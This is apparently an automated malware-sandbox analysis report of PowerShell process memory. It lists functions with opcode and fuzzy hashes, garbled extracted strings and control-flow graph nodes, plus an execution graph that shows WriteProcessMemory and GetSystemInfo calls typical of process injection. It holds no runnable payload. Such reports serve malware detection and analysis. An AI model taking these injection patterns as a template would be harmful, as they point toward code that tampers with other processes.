                                                                                      • Instruction ID: 7e6cf89e2e066df889b7eb2902404a03e2038385eb343a1b19fd1373f992e5b5
                                                                                      • Opcode Fuzzy Hash: 4f20b92f263d749c40af46b400da336b9f3608a63175840e3f580a38fbf3ccdc
                                                                                      • Instruction Fuzzy Hash: E5517430908B1C8FDB68DB58D855BE9BBF1FB59310F0082AAD04DD3292DE74A9858F81
                                                                                      Function 00007FFD9B8A24E5 Relevance: .2, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a27d0a41555a3a00938deeb57fdf9ffbcb979df56dbc2436099c0f62acbcaf4
                                                                                      • Instruction ID: c8553d31464033b7dafcfa63c27fa149627a15f7b44b1520a41e06308a9c2eb9
                                                                                      • Opcode Fuzzy Hash: 1a27d0a41555a3a00938deeb57fdf9ffbcb979df56dbc2436099c0f62acbcaf4
                                                                                      • Instruction Fuzzy Hash: 8051D472B0FACA4FE7B6ABE845B51A87BD1BF59254B1900FEC449C71E3DC09AD448321
                                                                                      Function 00007FFD9B7DA5F4 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92fd20e42c13dd353265d887dfa0d8a09cc2681f22b510f85be1802f6dcf39cd
                                                                                      • Instruction ID: c25bc400bfa9b5495b4d65ab092e2556e5b4c0cda59e39aa7c29ac5b2a12550a
                                                                                      • Opcode Fuzzy Hash: 92fd20e42c13dd353265d887dfa0d8a09cc2681f22b510f85be1802f6dcf39cd
                                                                                      • Instruction Fuzzy Hash: 53314130A1A64DCEFBB49F54CD29BF832A4FF81359F411339D54E860B2CA386A49CB11
                                                                                      Function 00007FFD9B7D39F5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 6887d30d0d8c0609aff371290804b0c764e6ab36b3a757ae8d377c1e0bab6457
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: E901A73020CB0C4FD748EF0CE051AA5B7E0FB85360F10066DE58AC36A5D632E881CB41
                                                                                      Function 00007FFD9B8A04D8 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1824315692.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9599edaf71700c22bbc0cba4f470ccd8f74a852cd4b9bda0ee78556f4db38ef6
                                                                                      • Instruction ID: e04d96354c5c11d2503d4830a67ca1752efc216271b4de3e5bb22c77cf8fc9d6
                                                                                      • Opcode Fuzzy Hash: 9599edaf71700c22bbc0cba4f470ccd8f74a852cd4b9bda0ee78556f4db38ef6
                                                                                      • Instruction Fuzzy Hash: 19E09223F1F96D4EEBB1AB9864281F86281EF58A2571501B6E91CD2191DC049D104791

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B7D211D Relevance: .6, Instructions: 626COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1823924103.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b7d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6601cf06fb408124b0fde899774448f048c9dd487c5ce3d0fc2b8e6ffd315e95
                                                                                      • Instruction ID: 56e5030552264c57d5e3973e13a612f2adac20bbce27c7d356a7f3c09f4f5945
                                                                                      • Opcode Fuzzy Hash: 6601cf06fb408124b0fde899774448f048c9dd487c5ce3d0fc2b8e6ffd315e95
                                                                                      • Instruction Fuzzy Hash: 3B02B267B0E7D24EE36256AD98B50D53F60EFD326970F02F7C4D48A0B3A919294F8361

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:10.6%
                                                                                      Total number of Nodes:47
                                                                                      Total number of Limit Nodes:7
                                                                                      execution_graph 83301 81665b0 83302 81665c8 83301->83302 83303 81666d3 83302->83303 83309 6d03d78 83302->83309 83313 6d03c0f 83302->83313 83318 6d03908 83302->83318 83323 6d0387b 83302->83323 83328 6d03907 83302->83328 83311 6d03dc3 WriteProcessMemory 83309->83311 83312 6d03e14 83311->83312 83312->83303 83316 6d03b6d 83313->83316 83317 6d03c28 83313->83317 83314 6d03dd9 WriteProcessMemory 83315 6d03e14 83314->83315 83315->83303 83316->83313 83316->83314 83321 6d03940 83318->83321 83319 6d03dd9 WriteProcessMemory 83320 6d03e14 83319->83320 83320->83303 83321->83319 83322 6d03996 83321->83322 83322->83303 83324 6d03885 83323->83324 83325 6d03dd9 WriteProcessMemory 83324->83325 83327 6d03996 83324->83327 83326 6d03e14 83325->83326 83326->83303 83327->83303 83329 6d03908 83328->83329 83330 6d03996 83329->83330 83331 6d03dd9 WriteProcessMemory 83329->83331 83330->83303 83332 6d03e14 83331->83332 83332->83303 83276 8160048 83277 81601a8 83276->83277 83278 8160072 83276->83278 83278->83277 83283 6d02a60 83278->83283 83288 6d02e30 83278->83288 83291 6d02cb8 83278->83291 83296 6d02a50 83278->83296 83286 6d02a99 83283->83286 83284 6d02e76 GetSystemInfo 83285 6d02ea6 83284->83285 83285->83277 83286->83284 83287 6d02b6e 83286->83287 83287->83277 83289 6d02e76 GetSystemInfo 83288->83289 83290 6d02ea6 83289->83290 83290->83277 83294 6d02be8 83291->83294 83295 6d02cd1 83291->83295 83292 6d02e76 GetSystemInfo 83293 6d02ea6 83292->83293 83293->83277 83294->83291 83294->83292 83299 6d02a99 83296->83299 83297 6d02e76 GetSystemInfo 83298 6d02ea6 83297->83298 83298->83277 83299->83297 83300 6d02b6e 83299->83300 83300->83277

                                                                                      Executed Functions

                                                                                      Function 06F4C250 Relevance: 16.2, Strings: 12, Instructions: 1154COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,jq$4$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-2524271925
                                                                                      • Opcode ID: e3ffecd5c9f48ecc27d030062cc5b5ef345f7b288e4412fe74fa98a44b68c1aa
                                                                                      • Instruction ID: 8858d085afc19a3dd88edfd2fe34b33ac8a3d010c4f69b4f006368ccfad883de
                                                                                      • Opcode Fuzzy Hash: e3ffecd5c9f48ecc27d030062cc5b5ef345f7b288e4412fe74fa98a44b68c1aa
                                                                                      • Instruction Fuzzy Hash: E3B20774E01218CFDB54DFA9C994BADBBB6BF88300F148599E505AB2A5DB70DC82CF50
                                                                                      Function 06F4C587 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,jq$4$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-2005009869
                                                                                      • Opcode ID: 5586165b018892cf18d0b2e027b1088e1e54dcf9e7dbb8822ecc10bacb499b65
                                                                                      • Instruction ID: cf834d67a5083a8891c986f487a58b5077f91e5e27694b9702cde0284ed7176c
                                                                                      • Opcode Fuzzy Hash: 5586165b018892cf18d0b2e027b1088e1e54dcf9e7dbb8822ecc10bacb499b65
                                                                                      • Instruction Fuzzy Hash: C0220934E01215CFDB54DF68C984BADBBB2BF48304F1491A9E509AB6A5DB70DD82CF50
                                                                                      Function 06D02A60 Relevance: 1.8, APIs: 1, Instructions: 316COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3929 6d02a60-6d02a97 3930 6d02a99-6d02aa0 3929->3930 3931 6d02add 3929->3931 3933 6d02ab1 3930->3933 3934 6d02aa2-6d02aaf 3930->3934 3932 6d02ae0-6d02b1c 3931->3932 3942 6d02ba0-6d02bab 3932->3942 3943 6d02b22-6d02b2b 3932->3943 3935 6d02ab3-6d02ab5 3933->3935 3934->3935 3938 6d02ab7-6d02aba 3935->3938 3939 6d02abc-6d02abe 3935->3939 3944 6d02adb 3938->3944 3940 6d02ac0-6d02acd 3939->3940 3941 6d02acf 3939->3941 3946 6d02ad1-6d02ad3 3940->3946 3941->3946 3947 6d02bba-6d02be2 3942->3947 3948 6d02bad-6d02bb0 3942->3948 3943->3942 3945 6d02b2d-6d02b33 3943->3945 3944->3932 3950 6d02e11-6d02ea4 GetSystemInfo 3945->3950 3951 6d02b39-6d02b46 3945->3951 3946->3944 3956 6d02cd1-6d02cee 3947->3956 3957 6d02be8-6d02bf1 3947->3957 3948->3947 3961 6d02ea6 3950->3961 3962 6d02eab-6d02ebf 3950->3962 3952 6d02b97-6d02b9e 3951->3952 3953 6d02b48-6d02b6c 3951->3953 3952->3942 3952->3945 3967 6d02b93 3953->3967 3968 6d02b6e-6d02b71 3953->3968 3969 6d02cf4-6d02d50 3956->3969 3957->3950 3960 6d02bf7-6d02c27 3957->3960 3973 6d02c71-6d02c84 3960->3973 3974 6d02c29-6d02c6f 3960->3974 3961->3962 3967->3952 3971 6d02b73-6d02b76 3968->3971 3972 6d02b7d-6d02b90 3968->3972 3986 6d02d52-6d02d98 3969->3986 3987 6d02d9a-6d02dad 3969->3987 3971->3972 3976 6d02c86-6d02c8d 3973->3976 3974->3976 3977 6d02cb5-6d02ccb 3976->3977 3978 6d02c8f-6d02ca0 3976->3978 3977->3956 3977->3957 3978->3977 3983 6d02ca2-6d02cae 3978->3983 3983->3977 3988 6d02daf-6d02db6 3986->3988 3987->3988 3989 6d02dc5-6d02dcf 3988->3989 3990 6d02db8-6d02dbe 3988->3990 3989->3969 3990->3989
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612352503.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 961b98e2265f1fcb312bd03e27dd04a9526b414459b2772b33b983267af97f4d
                                                                                      • Instruction ID: eae57998420581a36557651df0dea540756632d1369f455bba7af1ff4d14a85e
                                                                                      • Opcode Fuzzy Hash: 961b98e2265f1fcb312bd03e27dd04a9526b414459b2772b33b983267af97f4d
                                                                                      • Instruction Fuzzy Hash: CFD11B70D01219DFDB61CFA8C984A9DFBB1BF48314F24865AD858AB751CB70AA85CF90
                                                                                      Function 06F6A670 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4174 6f6a670-6f6a69b 4175 6f6a6a2-6f6a6f1 4174->4175 4176 6f6a69d 4174->4176 4180 6f6a6f3 4175->4180 4181 6f6a6fa-6f6a72f call 6f6ac40 4175->4181 4176->4175 4180->4181 4184 6f6a735-6f6a790 4181->4184 4187 6f6a792-6f6a798 4184->4187 4188 6f6a79a-6f6a7a0 4184->4188 4187->4188 4189 6f6a7a2 4188->4189 4190 6f6a7a9-6f6a7aa 4188->4190 4189->4190 4191 6f6aa37-6f6aa5f 4189->4191 4192 6f6a9d4-6f6a9e8 4189->4192 4193 6f6aa95 4189->4193 4194 6f6a992-6f6a9cf 4189->4194 4195 6f6ab13-6f6ab38 4189->4195 4196 6f6a871-6f6a885 4189->4196 4197 6f6a8d1-6f6a8d5 4189->4197 4198 6f6a7dd-6f6a816 4189->4198 4199 6f6a7bb-6f6a7bd 4189->4199 4200 6f6ab44 4189->4200 4201 6f6a900-6f6a97f 4189->4201 4202 6f6aac1-6f6aade 4189->4202 4203 6f6a7ac-6f6a7b9 4189->4203 4204 6f6a88a 4189->4204 4205 6f6aa69-6f6aa70 4189->4205 4190->4199 4221 6f6aa25-6f6aa2b 4191->4221 4228 6f6aa61-6f6aa67 4191->4228 4206 6f6a9ea-6f6aa19 4192->4206 4208 6f6aa96 4193->4208 4214 6f6a7c8-6f6a7ce 4194->4214 4229 6f6ab01-6f6ab07 4195->4229 4233 6f6ab3a-6f6ab42 4195->4233 4196->4206 4197->4204 4210 6f6a8d7-6f6a8ed 4197->4210 4241 6f6a840 4198->4241 4242 6f6a818-6f6a824 4198->4242 4207 6f6a88b-6f6a8be 4199->4207 4212 6f6ab45 4200->4212 4201->4214 4251 6f6a985-6f6a98d 4201->4251 4202->4212 4216 6f6aae0-6f6aaf7 4202->4216 4203->4188 4204->4207 4205->4208 4209 6f6aa72-6f6aa89 4205->4209 4206->4221 4235 6f6aa1b-6f6aa23 4206->4235 4207->4198 4246 6f6a8c4-6f6a8cc 4207->4246 4208->4202 4209->4221 4222 6f6aa8b-6f6aa93 4209->4222 4213 6f6a8f3-6f6a8fb 4210->4213 4210->4214 4223 6f6ab46 4212->4223 4213->4214 4231 6f6a7d7-6f6a7d8 4214->4231 4232 6f6a7d0 4214->4232 4216->4229 4230 6f6aaf9-6f6aaff 4216->4230 4225 6f6aa34-6f6aa35 4221->4225 4226 6f6aa2d 4221->4226 4222->4221 4223->4223 4225->4193 4226->4191 4226->4193 4226->4195 4226->4200 4226->4205 4226->4225 4228->4221 4237 6f6ab10-6f6ab11 4229->4237 4238 6f6ab09 4229->4238 4230->4229 4231->4201 4232->4191 4232->4192 4232->4193 4232->4194 4232->4195 4232->4196 4232->4197 4232->4198 4232->4200 4232->4201 4232->4204 4232->4205 4232->4231 4233->4229 4235->4221 4237->4195 4238->4195 4238->4200 4238->4237 4245 6f6a846-6f6a860 4241->4245 4243 6f6a826-6f6a82c 4242->4243 4244 6f6a82e-6f6a834 4242->4244 4248 6f6a83e 4243->4248 4244->4248 4245->4214 4249 6f6a866-6f6a86c 4245->4249 4248->4245 4249->4214 4251->4214
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PHfq
                                                                                      • API String ID: 0-2154135885
                                                                                      • Opcode ID: 7d3374a2948b0d08ffc4013e0c14390b57a5d9769e1e0c9fb169367c255034ae
                                                                                      • Instruction ID: 72612a2d7affe48f66c2fe98deb5681c40880f814cbf3e4d7a2c11b8acc08919
                                                                                      • Opcode Fuzzy Hash: 7d3374a2948b0d08ffc4013e0c14390b57a5d9769e1e0c9fb169367c255034ae
                                                                                      • Instruction Fuzzy Hash: B7D13774E05218CFEB54CFAAD984B9EBBF2BB49300F1080AAE009B7255DB745985CF41
                                                                                      Function 06D19EB8 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tefq
                                                                                      • API String ID: 0-1066582953
                                                                                      • Opcode ID: d580d321ad7521bbec4abb3e4abfb8ba9fe00fbd7310d814eca6f791cfd1e4f0
                                                                                      • Instruction ID: aa600dd69b909b1bd13b3bd44d2e95b29ed766aaa9d9295cacfd8f41176f5ebe
                                                                                      • Opcode Fuzzy Hash: d580d321ad7521bbec4abb3e4abfb8ba9fe00fbd7310d814eca6f791cfd1e4f0
                                                                                      • Instruction Fuzzy Hash: D0A12A70E05208DFEB54CFA9E494B9DBBF6BF89300F24906AE419AB355DB709985CF40
                                                                                      Function 06D19EA8 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Tefq
                                                                                      • API String ID: 0-1066582953
                                                                                      • Opcode ID: 25b089ce29ba8990cb3a2696522a08ff053759f1b478b9f4f7f2f2ecfeedb214
                                                                                      • Instruction ID: 25a00fc943b6e9e5d7bb2b1cd3b4c3079fd31e73f343c5ed4263b869bed00c4b
                                                                                      • Opcode Fuzzy Hash: 25b089ce29ba8990cb3a2696522a08ff053759f1b478b9f4f7f2f2ecfeedb214
                                                                                      • Instruction Fuzzy Hash: 2AA13974E01208DFEB54CFA9D894B9DBBF2BF88304F24906AE419AB355DB709981CF40
                                                                                      Function 0455C750 Relevance: 1.1, Instructions: 1072COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2537144071.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_4550000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f96b555b15d7528f4f8eeafa833fed1e1399fd8e5a35cc0a76090be687d2d3b6
                                                                                      • Instruction ID: ea6c306ff7288ff71b09674df02eddc20abce9923a0a44c78eabad16b1e63429
                                                                                      • Opcode Fuzzy Hash: f96b555b15d7528f4f8eeafa833fed1e1399fd8e5a35cc0a76090be687d2d3b6
                                                                                      • Instruction Fuzzy Hash: BB924B75A012489FCB05CFA8D494AAEFBF1FF48314F24855AE805AB361C735ED86DB90
                                                                                      Function 06F6C707 Relevance: .1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f13698bcdb89b6ebacb7f053dbdd6697d4d98c3c41b6f183612d7b930736633
                                                                                      • Instruction ID: a033f875597f81e086cb93a2c3310a5609de9865e261e8c465d08a1be86bf2fa
                                                                                      • Opcode Fuzzy Hash: 6f13698bcdb89b6ebacb7f053dbdd6697d4d98c3c41b6f183612d7b930736633
                                                                                      • Instruction Fuzzy Hash: 3F41F4B5D05218CFEB54CF9AD840BDDBBF6AB89300F14C1AAE488AB214DB3459458F54
                                                                                      Function 073D6E38 Relevance: 43.6, Strings: 34, Instructions: 1097COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$84ml$84ml$84ml$84ml$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-4230029179
                                                                                      • Opcode ID: afdea538281236ee825bf7a0d68ce2b3bdb011b335bc3ddc1da951b075ec3acc
                                                                                      • Instruction ID: d8038568f924f79c997fdf5562f394db2501df8a9b6328d46b8e02c8cf8d1d28
                                                                                      • Opcode Fuzzy Hash: afdea538281236ee825bf7a0d68ce2b3bdb011b335bc3ddc1da951b075ec3acc
                                                                                      • Instruction Fuzzy Hash: C1823BF270020ADFEB248F69E4456ABBBB6FF85310F14C46AE8198B691DB31DD41C791
                                                                                      Function 073D93B8 Relevance: 31.3, Strings: 24, Instructions: 1344COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $ak$(fol$(fol$(fol$(fol$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$x.`k$$fq$$fq$$fq$$fq$$fq$$fq$el$el
                                                                                      • API String ID: 0-3273723472
                                                                                      • Opcode ID: 6528c7ed0e7bd9fc04b44b439943f2cf81510463e9396fbfa2e387e336322e9e
                                                                                      • Instruction ID: f5d2cf35b58226c75c807a1d3249786c4298df48f495d9aba3c547f65082b307
                                                                                      • Opcode Fuzzy Hash: 6528c7ed0e7bd9fc04b44b439943f2cf81510463e9396fbfa2e387e336322e9e
                                                                                      • Instruction Fuzzy Hash: 35A2C1F6B002059FEB24CFA9D544B6ABBB6EF85314F24C06AD4099B751DB31EC42CB91
                                                                                      Function 073DA6E0 Relevance: 17.9, Strings: 14, Instructions: 444COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 765 73da6e0-73da70b 766 73da99d-73da9b4 765->766 767 73da711-73da716 765->767 777 73da9d7-73da9e5 766->777 778 73da9b6-73da9d4 766->778 768 73da72e-73da732 767->768 769 73da718-73da71e 767->769 770 73da738-73da73c 768->770 771 73da94a-73da954 768->771 773 73da720 769->773 774 73da722-73da72c 769->774 775 73da74f 770->775 776 73da73e-73da74d 770->776 779 73da956-73da95f 771->779 780 73da962-73da968 771->780 773->768 774->768 782 73da751-73da753 775->782 776->782 783 73da9eb-73da9f0 777->783 784 73dabf4-73dac29 777->784 778->777 785 73da96e-73da97a 780->785 786 73da96a-73da96c 780->786 782->771 787 73da759-73da75b 782->787 788 73daa08-73daa14 783->788 789 73da9f2-73da9f8 783->789 799 73dac2b 784->799 800 73dac30-73dac37 784->800 790 73da97c-73da99a 785->790 786->790 792 73da75d-73da778 787->792 793 73da77a 787->793 802 73dab9e-73daba8 788->802 803 73daa1a-73daa1d 788->803 794 73da9fc-73daa06 789->794 795 73da9fa 789->795 801 73da77c-73da77e 792->801 793->801 794->788 795->788 799->800 804 73dac3e-73dac84 800->804 805 73dac39 800->805 801->771 808 73da784-73da7b0 801->808 811 73dabaa-73dabb3 802->811 812 73dabb6-73dabbc 802->812 803->802 809 73daa23-73daa2a 803->809 827 73dac89-73dac9c 804->827 805->804 808->771 835 73da7b6-73da7c3 808->835 809->784 814 73daa30-73daa35 809->814 815 73dabbe-73dabc0 812->815 816 73dabc2-73dabce 812->816 819 73daa4d-73daa51 814->819 820 73daa37-73daa3d 814->820 821 73dabd0-73dabf1 815->821 816->821 819->802 825 73daa57-73daa5b 819->825 823 73daa3f 820->823 824 73daa41-73daa4b 820->824 823->819 824->819 828 73daa5d-73daa6c 825->828 829 73daa6e 825->829 833 73daa70-73daa72 828->833 829->833 833->802 836 73daa78-73daa7a 833->836 838 73da85c-73da89b 835->838 839 73da7c9-73da7ce 835->839 840 73daa7c-73daa88 836->840 841 73daa8a 836->841 874 73da8a2-73da8a6 838->874 843 73da7e6-73da7ff 839->843 844 73da7d0-73da7d6 839->844 842 73daa8c-73daa8e 840->842 841->842 842->802 845 73daa94-73daa9c 842->845 843->838 857 73da801-73da823 843->857 846 73da7d8 844->846 847 73da7da-73da7e4 844->847 849 73daa9e-73daaa4 845->849 850 73daaba 845->850 846->843 847->843 853 73daaaa-73daab6 849->853 854 73daaa6-73daaa8 849->854 855 73daabc-73daac7 850->855 858 73daab8 853->858 854->858 855->802 865 73daacd-73daae7 855->865 863 73da83d-73da847 857->863 864 73da825-73da82b 857->864 858->855 869 73da84c-73da85a 863->869 866 73da82d 864->866 867 73da82f-73da83b 864->867 871 73daae9-73daaf2 865->871 872 73dab0a 865->872 866->863 867->863 869->874 875 73daaf9-73dab06 871->875 876 73daaf4-73daaf7 871->876 877 73dab0d-73dab2c 872->877 878 73da8c9 874->878 879 73da8a8-73da8b1 874->879 881 73dab08 875->881 876->881 897 73dab2e-73dab34 877->897 898 73dab44-73dab9b 877->898 884 73da8cc-73da8d8 878->884 882 73da8b8-73da8c5 879->882 883 73da8b3-73da8b6 879->883 881->877 887 73da8c7 882->887 883->887 890 73da8da-73da8e0 884->890 891 73da8f0-73da947 884->891 887->884 893 73da8e4-73da8e6 890->893 894 73da8e2 890->894 893->891 894->891 900 73dab38-73dab3a 897->900 901 73dab36 897->901 900->898 901->898
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq$4'fq$4'fq$4'fq$84ml$84ml$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                      • API String ID: 0-401777151
                                                                                      • Opcode ID: ed28126c3ae1fdc077a53e8b07aeb31c46a89e2e00c0e968c18c587c53ff956d
                                                                                      • Instruction ID: d6446b58ed99c6a1cdcd71ab30e8ae86341633a16bc3182e59a4d7b4f39eae18
                                                                                      • Opcode Fuzzy Hash: ed28126c3ae1fdc077a53e8b07aeb31c46a89e2e00c0e968c18c587c53ff956d
                                                                                      • Instruction Fuzzy Hash: F3E1F7F2B002059FEB148FA9D64066ABBF7FF85314F14C46AE9098B691CB71DC42CB91
                                                                                      Function 0816A157 Relevance: 13.7, Strings: 10, Instructions: 1230COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
